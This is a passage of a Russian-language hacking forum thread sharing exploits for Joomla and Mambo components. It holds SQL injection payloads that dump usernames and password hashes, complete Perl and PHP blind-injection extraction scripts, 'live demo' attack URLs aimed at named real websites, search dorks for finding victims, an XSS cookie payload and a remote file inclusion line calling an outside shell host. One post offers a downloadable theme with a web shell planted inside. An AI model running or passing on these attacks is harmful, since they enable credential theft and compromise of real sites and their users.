Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов

Discussion in 'Веб-уязвимости' started by it's my, 6 Oct 2007.

  1. swt1

    swt1 Elder - Старейшина

    Joined:
    16 Feb 2008
    Messages:
    306
    Likes Received:
    78
    Reputations:
    21
    Joomla Component com_jumi (fileid) Blind SQL Injection Exploit

    ------------------------------------------------------------------------------
    Joomla Component com_jumi (fileid) Blind SQL-injection Vulnerability
    ------------------------------------------------------------------------------


    #####################################################
    # [+] Author : Chip D3 Bi0s #
    # [+] Email : chipdebios[alt+64]gmail.com #
    # [+] Vulnerability : Blind SQL injection #
    #####################################################



    Example:

    Code:
    http://localHost/path/index.php?option=com_jumi&fileid=n<Sql Code>
    n=number fileid valid

    <Sql code>:

    Code:
    '+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1/*  '+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/*  /index.php?option=com_jumi&fileid=2'+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/*
    etc, etc...

    DEMO LIVE:
    Code:
    http://www.elciudadano.gov.ec/index.php?option=com_jumi&fileid=2'+and+ascii(substring((SELECT+concat(username,0x3a,password)+from+jos_users+limit+0,1),1,1))=101/*
    etc, etc....

    +++++++++++++++++++++++++++++++++++++++
    #[!] Produced in South America
    +++++++++++++++++++++++++++++++++++++++

    if you want to save the work, you can use the following script

    -------------------------------

    PHP:
    #!/usr/bin/perl -w    use LWP::UserAgent;      print "\t\t-------------------------------------------------------------\n\n";  print "\t\t                      |  Chip d3 Bi0s |                       \n\n";  print "\t\t Joomla Component com_jumi (fileid) Blind SQL-injection        \n\n";  print "\t\t-----------------------------------------------------------------\n\n";          print "http://wwww.host.org/Path: ";  chomp(my $target=<STDIN>);  print " [-] Introduce fileid: ";  chomp($z=<STDIN>);    print " [+] Password: ";    $column_name="concat(password)";  $table_name="jos_users";      $b = LWP::UserAgent->new() or die "Could not initialize browser\n";  $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');      for ($x=1;$x<=32;$x++) #x limit referido a la posicion del caracter  {            #c referido a ascci 48-57, 97-102             for ($c=48;$c<=57;$c++)     {   $host = $target . "/index.php?option=com_jumi&fileid=".$z."'+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c."/*";   my $res = $b->request(HTTP::Request->new(GET=>$host));   my $content = $res->content;   my $regexp = "com_";  # print "limit:";  # print "$x";  # print "; assci:";  # print "$c;";   if ($content =~ /$regexp/) {$char=chr($c); print "$char";}   }            for ($c=97;$c<=102;$c++)   {          $host = $target . "/index.php?option=com_jumi&fileid=".$z."'+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c."/*";   my $res = $b->request(HTTP::Request->new(GET=>$host));   my $content = $res->content;   my $regexp = "com_";  # print "limit:";  # print "$x";  # print "; assci:";  # print "$c;";   if ($content =~ /$regexp/) {$char=chr($c); print "$char";}   }       }
    # milw0rm.com [2009-06-15]
     
    #141 swt1, 16 Jun 2009
    Last edited: 16 Jun 2009
  2. swt1

    swt1 Elder - Старейшина

    Joined:
    16 Feb 2008
    Messages:
    306
    Likes Received:
    78
    Reputations:
    21
    Joomla Component com_ijoomla_rss Blind SQL Injection Exploit

    Code:
    #!/usr/bin/perl  use LWP::UserAgent;  use Getopt::Long;  if(!$ARGV[1])  {    print "                                                                        \n";    print "  ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";    print "  o   Joomla Component com_ijoomla_rss Blind SQL Injection Exploit              o\n";    print "  o   Author:xoron                                               o\n";    print "  o   More info:http://joomla15.ijoomlademo.com o\n";    print "  o   vendor:http://ijoomlademo.com                                o\n";    print "  o   Dork :   com_ijoomla_rss                                       o\n";    print "  o   Usage:   perl bachir.pl host path <options>                       o\n";    print "  o   Example: perl bachir.pl www.host.com /joomla/ -s 2                o\n";    print "  ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";    exit;  }  my $host    = $ARGV[0];  my $path    = $ARGV[1];  my $userid  = 1;  my $sid     = $ARGV[2];  my %options = ();  GetOptions(\%options, "u=i", "s=i");  print "[~] Exploiting...\n";  if($options{"u"})  {    $userid = $options{"u"};  }  if($options{"s"})  {    $sid = $options{"s"};  }  syswrite(STDOUT, "[~] MD5-Hash: ", 14);  for(my $i = 1; $i <= 32; $i++)  {    my $f = 0;    my $h = 48;    while(!$f && $h <= 57)    {      if(istrue2($host, $path, $userid, $sid, $i, $h))      {        $f = 1;        syswrite(STDOUT, chr($h), 1);      }      $h++;    }    if(!$f)    {      $h = 97;      while(!$f && $h <= 122)      {        if(istrue2($host, $path, $userid, $sid, $i, $h))        {          $f = 1;          syswrite(STDOUT, chr($h), 1);        }        $h++;      }    }  }  print "\n[~] Exploiting done\n";  sub istrue2  {    my $host  = shift;    my $path  = shift;    my $uid   = shift;    my $sid   = shift;    my $i     = shift;    my $h     = shift;       my $ua = LWP::UserAgent->new;    my $query = "http://".$host.$path."index.php?option=com_ijoomla_rss&act=xml&cat=".$sid." and SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1)=char(".$h.")";    my $resp = $ua->get($query);    my $content = $resp->content;    my $regexp = "seminar_boxA";       if($content =~ /$regexp/)    {      return 1;    }    else    {      return 0;    }  }
    # milw0rm.com [2009-06-15]
     
  3. swt1

    swt1 Elder - Старейшина

    Joined:
    16 Feb 2008
    Messages:
    306
    Likes Received:
    78
    Reputations:
    21
    Joomla Component com_tickets <= 2.1 (id) SQL Injection Vuln

    ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    Joomla Component com_tickets (id) SQL-injection Vulnerability
    ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

    ###################################################
    [+] Author : Chip D3 Bi0s
    [+] Email : chipdebios[alt+64]gmail.com
    [+] Greetz : d4n1ux + x_jeshua + eCORE + rayok3nt
    [+] Vulnerability : SQL injection

    ###################################################

    Info component:
    ššššššššššššššš
    Name : Tickets
    Version : 0.1 & 2.1
    Author : Paul Coogan
    Author email : [email protected]
    Web author : http://www.ideabuzz.com

    ###################################################

    Code:
    Example:  http://localHost/path/index.php?option=com_tickets&task=form&id=n[SQL code]
    n = id valid

    Demo Live Joomla : version 2.1
    šššššššššššššššššššššššššššššš

    Code:
    http://www.helendaleeducationfoundation.org/index.php?option=com_tickets&task=form&id=1+and+1=2+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users/*
    Demo Live Mambo : Version 0.1
    ššššššššššššššššššššššššššššš

    Code:
    http://www.narip.com/index.php?option=com_tickets&task=form&id=68+and+1=2+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+mos_users/*
    +++++++++++++++++++++++++++++++++++++++
    #[!] Produced in South America
    +++++++++++++++++++++++++++++++++++++++

    # milw0rm.com [2009-06-22]
     
  4. Fata1ex

    Fata1ex Elder - Старейшина

    Joined:
    12 Dec 2006
    Messages:
    703
    Likes Received:
    300
    Reputations:
    38
    com_svmap
    Вот наткнулся случайно. Может кто доведет до ума, если, конечно, есть что доводить.
    Code:
    www.allegra.as/index.php?option=com_svmap&id=-1&user_id=1&type=1&Itemid=2
     
  5. --StraNger--

    --StraNger-- Member

    Joined:
    4 Jan 2009
    Messages:
    63
    Likes Received:
    57
    Reputations:
    5
    если не ошибаюсь это не дыра
    просто ошибка в обработке данных
     
  6. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,186
    Likes Received:
    618
    Reputations:
    690
    SQL-Injection в компоненте doQment под joomla

    SQL-Injection в компоненте doQment под joomla
    Vulnerability : уязвимый параметр cid=

    Example:
    Code:
    http://www.agmodena.it/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users/**/where/**/usertype=CHAR(83,117,112,101,114,32,65,100,109,105 ,110,105,115,116,114,97,116,111,114)#&Itemid=92
    Dork: inurl:com_doqment + cid=
    # shell_c0de
     
    _________________________
    #146 shell_c0de, 8 Jul 2009
    Last edited: 8 Jul 2009
    3 people like this.
  7. InDuStRieS

    InDuStRieS Banned

    Joined:
    15 Mar 2009
    Messages:
    526
    Likes Received:
    253
    Reputations:
    32
    Joomla Almond Classifieds Component SQL Injection and Cross-Site Scripting

    Description:
    Moudi has reported some vulnerabilities in the Almond Classifieds component for Joomla, which can be exploited by malicious people to conduct SQL injection and cross-site scripting attacks.

    1) Input passed via the "replid" to index.php (when "option" is set to "com_aclassf", "Itemid" is set to a valid id, "ct" to "manw_repl" and "md" is set to "add_form") is not properly sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    2) Input passed via the "addr" parameter to components/com_aclassf/gmap.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

    The vulnerabilities are reported in version 7.5. Other versions may also be affected.

    Code:
    ###########################################################################
    #-----------------------------I AM MUSLIM !!------------------------------#
    ###########################################################################
    
    ==============================================================================
                                      _       _          _                _         _   _ 
                                     / \      | |        | |               / \       | |  | |
                                    / _ \    | |        | |              / _ \     | |_| |
                                  / ___ \  | |___  | |___       /___ \   |  _   |
       IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\  |_| |_|
                                                                 
    
    ==============================================================================
            [�] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
    ==============================================================================
            [�] Joomla Component v.7.5 (com_aclassf) Multiple Remote Vulnerabilities
    ==============================================================================
    
    	[�] Script:             [ Joomla Almond Classifieds v.7.5 ]
    	[�] Language:           [ PHP ]
            [�] Download:           [ http://www.almondsoft.com  ]
    	[�] Founder:            [ Moudi <[email protected]> ]
            [�] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
            [�] Team:               [ EvilWay ]
            [�] Dork:               [ OFF ]
            [�] Price:              [ $195 ]
            [�] Site :              [ https://security-shell.ws/forum.php ]
    
    ###########################################################################
    
    ===[ Exploit + LIVE : BLIND SQL INJECTION vulnerability ]===	
    	
    [�] http://www.site.com/patch/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=[BLIND]
    
    [�] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438   and 1=1 <= TRUE
    [�] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438   and 1=2 <= FALSE
    
    [�] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5
        => TRUE
    [�] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5
        => FALSE
    
    ===[ Exploit XSS + LIVE : vulnerability ]===
    
    [�] http://www.site.com/patch/components/com_aclassf/gmap.php?addr=[XSS]
    
    [�] http://www.almondsoft.com/j/components/com_aclassf/gmap.php?addr="><script>alert(document.cookie);</script>
    
    Author: Moudi
    
    ###########################################################################
    
     
    1 person likes this.
  8. xa-xa89

    xa-xa89 Elder - Старейшина

    Joined:
    17 May 2008
    Messages:
    108
    Likes Received:
    27
    Reputations:
    2
    Joomla component com_fireboard SQL-inj

    Joomla component com_fireboard SQL-inj

    Уязвимый параметр func
    Code:
    ?func=who',%20userid=123,%20link=(SELECT %20jos_users.password%20FROM%20jos_users%20WHERE%20jos_users.id=123)%20--%20a
    Более подробно смотрим сюда
    http://forum.antichat.ru/threadnav130926-1-10.html
    и вот сюда
    http://forum.antichat.ru/showpost.php?p=1409117&postcount=33
     
  9. swt1

    swt1 Elder - Старейшина

    Joined:
    16 Feb 2008
    Messages:
    306
    Likes Received:
    78
    Reputations:
    21
    ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++Joomla Component com_jfusion (Itemid) Blind SQL-injection Vulnerability
    ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

    ###################################################
    [+] Author : Chip D3 Bi0s
    [+] Email : chipdebios[alt+64]gmail.com
    [+] Vulnerability : Blind SQL injection

    ###################################################

    Example:
    Code:
    http://localHost/path/index.php?option=com_jfusion&Itemid=n[Sql Code]  n:valid Itemid
    Sql code:
    Code:
    +and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1/*
    etc, etc...

    DEMO LIVE:
    Code:
    http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1
    Code:
    http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=97  !False ¡¡¡¡
    Code:
    http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=98  ¡True ¡¡¡¡
    etc, etc...

    # milw0rm.com [2009-08-01]
     
    #149 swt1, 2 Aug 2009
    Last edited: 2 Aug 2009
  10. swt1

    swt1 Elder - Старейшина

    Joined:
    16 Feb 2008
    Messages:
    306
    Likes Received:
    78
    Reputations:
    21
    http://wwww.host.org/Path : http://www.cd7.com.ec/
    [-] Introduce Itemid : 66
    [-] Introduce coincidencia : http://www.cd7.com.ec/forum/

    +++++++++++++++++++++++++++++++++++++++
    #[!] Produced in South America
    +++++++++++++++++++++++++++++++++++++++

    PHP:
     #!/usr/bin/perl -w  use LWP::UserAgent;  use Benchmark;  my $t1 = new Benchmark;      print "\t\t-------------------------------------------------------------\n\n";  print "\t\t                      |  Chip d3 Bi0s |                       \n\n";  print "\t\t Joomla Component com_jfusion (Itemid) Blind SQL-injection        \n\n";  print "\t\t-------------------------------------------------------------\n\n";      print "http://wwww.host.org/Path   : ";chomp(my $target=<STDIN>);  print " [-] Introduce Itemid       : ";chomp($z=<STDIN>);  print " [-] Introduce coincidencia : ";chomp($w=<STDIN>);      $column_name="concat(password)";  $table_name="jos_users";      $b = LWP::UserAgent->new() or die "Could not initialize browser\n";  $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');    print "----------------Inyectando----------------\n";    #es Vulnerable?    $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+1=1";    my $res = $b->request(HTTP::Request->new(GET=>$host));  my $content = $res->content;  my $regexp = $w;    if ($content =~ /$regexp/) {    $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+1=2";    my $res = $b->request(HTTP::Request->new(GET=>$host));  my $content = $res->content;  my $regexp = $w;    if ($content =~ /$regexp/) {print " [-] Exploit Fallo :(\n";}    else    {print " [-] Vulnerable :)\n";    for ($x=1;$x<=32;$x++)       {      $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))>57";    my $res = $b->request(HTTP::Request->new(GET=>$host));  my $content = $res->content;  my $regexp = $w;    print " [!] ";if($x <= 9 ) {print "0$x";}else{print $x;}#para alininear 0..9 con los 10-32      if ($content =~ /$regexp/)    {                for ($c=97;$c<=102;$c++)     {   $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c." ";   my $res = $b->request(HTTP::Request->new(GET=>$host));   my $content = $res->content;   my $regexp = $w;       if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=102;}   }        }  else  {    for ($c=48;$c<=57;$c++)     {   $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c." ";   my $res = $b->request(HTTP::Request->new(GET=>$host));   my $content = $res->content;   my $regexp = $w;     if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=57;}   }      }        }  print " [+] Password   :"." ".join('', @caracter) . "\n";  my $t2 = new Benchmark;  my $tt = timediff($t2, $t1);  print "El script tomo:",timestr($tt),"\n";    }  }    else    {print " [-] Exploit Fallo :(\n";}
    # milw0rm.com [2009-08-01]
     
    #150 swt1, 2 Aug 2009
    Last edited: 2 Aug 2009
  11. swt1

    swt1 Elder - Старейшина

    Joined:
    16 Feb 2008
    Messages:
    306
    Likes Received:
    78
    Reputations:
    21
    Joomla Component com_pms 2.0.4 (Ignore-List) SQL Injection Exploit

    PHP:
    <?php

    /*
    --------------------------

    Joomla <=1.0.15 Component com_pms <=2.0.4  (Ignore-List) SQl-Injection Vuln

    --------------------------

    Author: M4dhead

    Vulnerable joomla component : com_pms

    Conditions        : magic_quotes_gpc = On or Off it doesn't matter ;)

    --------------------------

    PREPARATION:
    --------------------------
    You need a valid Account on the Joomla 1.0.15 Site + Community Builder Suite 1.1.0:


    Community Builder Suite 1.1.0:
    http://www.joomlaos.de/option,com_remository/Itemid,41/func,finishdown/id,1175.html

    PMS enhanced Version 2.0.4 J 1.0
    http://www.make-website.de/script-downlaods?task=summary&cid=123&catid=214


    Install Joomla 1.0.15
    Install Community Builder
    Install PMS Enhanced
        Activate the Ignorlist in Components->PMS Enhanced->Config
        Tab: Backend -> Ingorlist: Yes


    Create a valid User on the target Joomla 1.0.15 System with Community Builder,
    login and copy the cookieinformation into the $cookie var below,
    adjust the User-Agent on your Post Header dependent on your Browser.


    Notice: Pay attention on your User-Agent in the POST Header, it have to be the same as you have logged in,
    because the cookie-name is dependent on your browser.
    --------------------------

    USAGE:
    --------------------------
    Run this script! If there's not shown a page that prompt you to login, the attack was successful.
    Then go to the ignore list: www.yourtargetsite.com/index.php?option=com_pms&Itemid=&page=ignore
    and you will see some username and passwords in the selectbox :-)

    Have fun!!

    ----------------------------------------------------
    */


    $host "localhost"//your target Joomla Site
    $cookie "290cd01070fed63ac53f84f5c91d2bd9=a5846a8c64962e14367d5c7298f6c72c"//replace this with your own cookie values
    $useragent "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13\r\n";

    //NOTICE: Pay attention on your User-Agent in the POST Header, it have to be the same as you have logged in,
    //because the cookie-name is dependent on your browser.

    //Don't change anything below
    $path "/joomla/index.php?option=com_pms&Itemid=&page=ignore"//dont change this
    $data_to_send "no_entry=keine+Eintr%E4ge&save=Ignorliste+speichern&filter_site_users=alle&ignore_ids=|63, 111 ) AND 1=2 UNION SELECT 1,concat(username,char(0x3a), password),3 from jos_users -- /* |"//you don't have to change this


    print_r($post PostToHost($host$path$cookie$data_to_send$useragent));



    function 
    PostToHost($host$path$cookie$data_to_send$useragent) {
      
    $fp fsockopen($host80);
      
    fputs($fp"POST $path HTTP/1.1\r\n");
      
    fputs($fp"Host: $host\r\n");
      
    fputs($fp"User-Agent: $useragent");
      
    fputs($fp"Cookie: $cookie\r\n");
      
    fputs($fp"Content-type: application/x-www-form-urlencoded\r\n");
      
    fputs($fp"Content-length: "strlen($data_to_send) ."\r\n");
      
    fputs($fp"Connection: close\r\n\r\n");
      
    fputs($fp$data_to_send);
      while(!
    feof($fp)) {
          
    $res .= fgets($fp128);
      }
      
    fclose($fp);

      return 
    $res;
    }

    ?>
    # milw0rm.com [2009-08-07]
     
  12. FAQ666

    FAQ666 Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    38
    Likes Received:
    18
    Reputations:
    8
    COM_SOBI2

    COM_SOBI2
    SQL INJECTION
    http://www.sigsiu.net/download/components/sigsiu_online_business_index_2_for_joomla_1.0.x.html
    Проверял только на Joomla_1.0.x

    Code:
    index.php?option=com_sobi2&sobi2Task=search&Itemid=26
    benchmark

    в поле поиск вводить
    Code:
    ')and+benchmark(10000000,benchmark(10000000,md5(now())))# a
    Обязательно удалить все пробелы
    и нажимать поиск)
     
    #152 FAQ666, 10 Aug 2009
    Last edited: 10 Aug 2009
    1 person likes this.
  13. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    Уязвимости компонентов Joomla/Mambo

    Уязвимость: SQL-Inj
    Компонент: The Publications
    Уязвимость в файле publications.php
    Уязвимый код:
    PHP:
    $query "SELECT * FROM #__content WHERE catid=$id  ORDER BY title DESC";
    Пример:
    Code:
    http://www.bscic.gov.bd/index.php?option=com_publications&Itemid=20&lang=en&id=6/**/and/**/1=0/**/union/**/select/**/1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14+from+jos_users--
     
    4 people like this.
  14. Nelzone

    Nelzone Banned

    Joined:
    12 Apr 2008
    Messages:
    172
    Likes Received:
    134
    Reputations:
    6
    Эксплоиты SQL-инъекции в компонентах Joomla

    На веб-сайте PacketStorm, посвященному компьютерной безопасности, было опубликовано сразу 7 эксплоитов с демонстрацией SQL-инъекции в дополнительных компонентах популярной системы управления контентом Joomla. Эксплоиты относятся к следующим компонентам системы: com_speech, com_pressrelease, com_mediaalert, com_joomloc, com_lucygames, com_tpdugg и com_bfsurvey_profree.

    Joomla Speech (эксплоит)
    Joomla Press Release (эксплоит)
    Joomla Media Alert (эксплоит)
    Joomla Joomloc (эксплоит)
    Joomla LucyGames (эксплоит)
    Joomla TPDugg (эксплоит)
    Joomla BF Survey Pro Free (эксплоит)
     
  15. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    Уязвимость: SQL-Inj
    Компонент: Jeporter
    Версия: 2.0
    Уязвимость в файле jeporter.php
    Уязвимый код:
    PHP:
        $cid mosGetParam$_REQUEST'cid'false);

    $sql "SELECT * FROM #__jeporter WHERE id= ".$cid;
            
    $database->setQuery$sql );
            
    $report NULL;
            
    $database->loadObject$report );

            
    $cid $report->id;
            
    $title $report->title;
            
    $jquery $report->jquery;
        
    $sql "SELECT * FROM #__jeporter_fields WHERE jeportid= ".$cid;
        
    $database->setQuery$sql);
        
    $rows $database->loadObjectList();
    Пример:
    Code:
    http://www.nationalaidsstrategy.org/index.php?option=com_jeporter&task=showreport&cid=-4+union+select+1,concat_ws(0x3a,username,password),3,4,5+from+jos_users--
     
    8 people like this.
  16. Zitt

    Zitt Elder - Старейшина

    Joined:
    7 May 2006
    Messages:
    736
    Likes Received:
    268
    Reputations:
    59
    Мож кому пригодится... Тема с шеллом внутри..
    после усьановки темы шелл будет в http://site.name/templates/jd_lagoon/ads.php

    http://depositfiles.com/files/lhtkdh0m1
     
    #156 Zitt, 12 Sep 2009
    Last edited: 15 Sep 2009
    3 people like this.
  17. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    Уязвимость: Blind SQL-Inj
    Компонент: com_clan_members
    Версия: 0.9.2.2b
    Уязвимость в файле clan_members.html.php
    Уязвимый код:
    PHP:
    $database->setQuery("SELECT * FROM #__clan_members WHERE id = $id"  );
    $member $database -> loadAssocList();
    $database->setQuery("SELECT * FROM #__users WHERE id = $id AND block = '0'"  );
    $usersdata $database -> loadAssocList();
    $database->setQuery("SELECT * FROM #__clan_members_squadperuser WHERE uid=$id);
    $rowsquadperuser $database -> loadObjectList();
    $database->setQuery("SELECT * FROM #__clan_members_comment WHERE memberid=$id);
    $rowmembercomment $database -> loadObjectList();
    $database->setQuery("SELECT * FROM #__clan_members_fields WHERE published=1 ORDER BY ordering" );
    $rowmemberfields $database -> loadObjectList();
    #Check if the user is logged in into the side
    $database->setQuery("SELECT count(distinct(userid)) as user_online FROM #__session WHERE guest=0 AND userid = $id");
    $online $database->loadResult();
    foreach(
    $rowsquadperuser as $squadperuser)
        {
            
    $database->setQuery("SELECT * FROM #__clan_members_squad WHERE published = '1' AND id = '$squadperuser->sid'"  );
            
    $squadname $database -> loadAssocList();
            if(
    $squadname[0]["squadpicture"] != '' || $squadname[0]["squadname"] != '')
            {
            
    $squadpicture_array[$i+1] = $squadname[0]["squadpicture"];
            if(
    $i == 0$squadnames .= $squadname[0]["squadname"]; else $squadnames .= ",".$squadname[0]["squadname"];
            
    $i++;
            }
        }
    Пример:
    true ->
    Code:
    http://www.team-halo.net/index.php?option=com_clan_members&id=62+and+substring(version(),1,1)=5&task=showClanMemberDetails
    false ->
    Code:
    http://www.team-halo.net/index.php?option=com_clan_members&id=62+and+substring(version(),1,1)=4&task=showClanMemberDetails
     
    1 person likes this.
  18. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    Уязвимость: RFI
    Компонент: UH_Events
    Версия: 0.99.0RC3a
    Уязвимость в файле admin.uhevents.php
    Требования: register_globals & allow_url_fopen = On
    Уязвимый код:
    PHP:
    require_once( $mosConfig_absolute_path."/administrator/components/$option/uhevents_config.php");
    Эксплойт:
    Code:
    .../components/uh_events/admin.uhevents.php?mosConfig_absolute_path=http://shell?
     
    5 people like this.
  19. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    Уязвимость: SQL
    Компонент: Projects
    Случайно наткнулся)
    Code:
    ?option=com_projects&Itemid=62&idProyecto=27+UNION+SELECT+1,2,CONCAT_WS(0x3a,Version(),Database(),User()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- 
    Пример:

    http://www.inab.org/?option=com_projects&Itemid=62&idProyecto=27+UNION+SELECT+1,2,CONCAT_WS(0x3a,Version(),Database(),User()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--

    Сюда же
    Уязвимость: SQL
    Компонент: com_nodes
    Code:
    ?option=com_nodes&Itemid=61&node=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12--&info=personal
    http://www.inab.org/index.php?option=com_nodes&Itemid=61&node=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12--&info=personal
     
    #159 Dimi4, 27 Sep 2009
    Last edited: 27 Sep 2009
    6 people like this.
  20. Rashid

    Rashid Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    46
    Likes Received:
    4
    Reputations:
    2
    Сканер уязвимостей для Joomla

    http://sourceforge.net/projects/joomscan/
     
    1 person likes this.